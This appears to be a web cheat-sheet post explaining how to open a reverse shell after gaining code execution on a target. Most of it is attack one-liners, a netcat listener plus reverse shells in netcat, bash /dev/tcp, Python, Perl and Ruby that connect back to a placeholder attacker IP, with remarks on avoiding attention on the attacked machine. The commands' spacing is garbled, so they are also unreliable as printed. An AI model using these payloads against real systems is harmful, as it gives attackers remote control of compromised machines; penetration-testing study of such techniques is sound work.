Cheat sheets

How to create a reverse shell

Share this with people that should know this:

Since we are talking about reverse shell connections, I think it would be nice to show where and how they can be applied.

How to create a reverse shell

In general, when you find a vulnerability with the ability to execute arbitrary code (RCE), your next step will be to start a reverse shell.

Netcat

Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there, and transmit it. Despite its usefulness and simplicity, many do not know how to use it and undeservedly bypass it.

With this utility, you can perform some of the steps in the penetration testing. This can be useful when there are no installed packages (or will attract attention) on the attacked machine, there are restrictions (for example, IoT / Embedded devices), etc.

What can be done with netcat:

  • Scan ports;
  • Forward ports;
  • Collect service banners;
  • Listen port (bind for reverse connection);
  • Download and upload files;
  • Output raw HTTP content;
  • Create a mini chat.

In general, using netcat, you can replace some of the unix utilities, so this tool can be considered a kind of combine for performing certain tasks.

$ nc -nvlp 443

This command opens TCP port 443 on all interfaces, and this port will be used further in the examples.

Netcat

$ nc -e / bin / sh YOUR-IP 443

In my opinion, this is the most classic example of a reverse shell, but in modern realities, netcat may simply not be installed on the server.

Bash

$ bash -i> & / dev / tcp / YOUR-IP / 443 0> & 1

* And this example, in my opinion, is the most dangerous, because in fact, apart from the bash interpreter (sh, ksh, zsh, etc …), it does not require any additional software, but only access to the dev subsystem is needed

Python

$ python -c ‘import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect ((” YOUR-IP “, 443 )); os.dup2 (s.fileno ( ), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call ([“/ bin / sh”, “- i”]); ‘

* In modern distributions Python is almost always present, and the standard library is quite enough to make a reverse shell connection

Perl

$ perl -e ‘use Socket; $ i = ” YOUR-IP “; $ p = 443; socket (S, PF_INET, SOCK_STREAM, getprotobyname (“tcp”)); if (connect (S, sockaddr_in ($ p, inet_aton ($ i)))) {open (STDIN, “> & S”); open (STDOUT, “> & S”); open (STDERR, “> & S”); exec (“/ bin / sh -i”); }; ‘

* Just like Python, almost all modern Linux distributions have Perl in their system

Ruby

$ ruby ​​-rsocket -e’f = TCPSocket.open (” YOUR-IP “, 443) .to_i; exec sprintf (“/ bin / sh -i <&% d> &% d 2> &% d”, f , f, f) ‘

* Ruby is found on modern Linux distributions, but much less often than Python and Perl

Share this with people that should know this: